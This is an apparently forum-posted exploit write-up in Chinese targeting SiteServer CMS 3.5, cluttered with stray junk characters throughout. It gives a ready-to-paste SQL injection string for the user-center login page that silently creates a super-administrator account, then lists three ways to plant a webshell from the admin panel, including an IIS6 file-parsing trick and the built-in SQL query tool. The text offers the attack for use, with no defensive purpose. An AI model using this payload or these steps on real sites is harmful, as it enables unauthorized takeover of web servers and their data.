经测试秒杀最新的3.5版
0 O) j$ E8 |1 R1 t# v% Estieserver官网:www.siteserver.cn# y& U4 t8 w' a! {8 C, b: N" r
EXP:1 g( E; g' N/ o8 d' g
直接访问UserCenter/login.aspx
; P q& p% s% t; L9 b用户名处输入:
) ~' R% i1 H" h& [( L+ `& A9 f7 L! |- f
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);– J# a! O% [6 Q; y- @
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。: j3 a. ?) O; f& M
之后再访问后台SiteServer/login.aspx用插入的用户登陆3 A# Y$ v- u3 q9 \8 e/ y: {
后台拿webshell的三种方法:
7 C; Z& [2 ?4 b% E8 t0 ]% q: g一、% l- t2 D. ~' j. K8 K9 W
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx* Q- w1 S5 R; p! w* }
二、! j) C5 o- X4 v' s+ v \8 j ^
成员权限-》添加用户-》用户名为:1.asp F; @# g" I3 X
http://127.0.0.1/usercenter/
A& O8 O" B1 g. p用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell+ X. V+ C$ \. [+ a
(ps:后台添加用户时不会验证是否含有非法字符)5 ?/ P2 w7 ]1 m; M, @8 r5 K4 g
三、* v7 K0 f8 F# p
系统工具-》实用工具-》机器参数查看3 M" }+ H* ~% P; p/ X. \
可以看到数据库类型、名称,WEB路径
2 e s' O2 w2 ?( t u系统工具-》数据库工具-》SQL语句查询
: d: M, s) V6 ~1 f这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |